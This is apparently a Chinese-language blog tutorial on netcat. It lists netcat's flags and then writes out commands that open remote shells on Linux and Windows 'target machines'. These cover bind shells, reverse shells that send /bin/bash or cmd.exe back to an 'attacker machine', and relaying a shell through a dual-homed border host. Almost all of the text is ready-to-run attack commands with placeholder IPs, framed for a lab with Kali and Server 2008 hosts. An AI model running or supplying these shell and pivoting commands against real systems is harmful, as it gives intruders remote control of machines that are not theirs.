-c 指定连接后执行shell命令
-e 指定连接后执行文件名
-l 监听模式
-p 设置本地通信端口
-u 使用UDP传输协议,默认是TCP
-v 显示命令执行过程,使用-vv显示更详细的信息
NC——正向ShellLinux靶机:
nc -lvp 8888 -e /bin/bash
靶机
攻击机:
nc 靶机ip 8888
连接靶机的攻击机ip 端口
攻击机
Windows靶机:
nc.exe -lvp 8888 -e cmd.exe
攻击机:
nc 靶机ip 8888
攻击机:攻击机打开监视器
nc -lvp 8888
打开攻击机的监控
靶机:
nc 攻击机ip 8888 -e /bin/bash
靶机
攻击机
Windows攻击机:
nc -lvp 80
靶机:
nc 攻击机ip 80 -e cmd.exe
靶机:(server2008)
nc.exe -lvp 6666 -e cmd.exe
攻击机:(kali02)
nc -lvp 8888
边界机:(kali 双网卡)
nc -nv 攻击机ip 8888 -c "nc 靶机ip 6666"
靶机:(server2008)
nc.exe -lvp 6666 -e cmd.exe
靶机
攻击机:(win702)
nc.exe -lvp 8888
攻击机
边界机:(win701 双网卡)
nc.exe -nv 攻击机ip 8888 -e "nc.exe 靶机ip 6666"
边界机
然后在攻击机中执行相关命令
攻击机
禁止转载,如需转载,请通过简信或评论联系作者。
1人点赞
建立通信隧道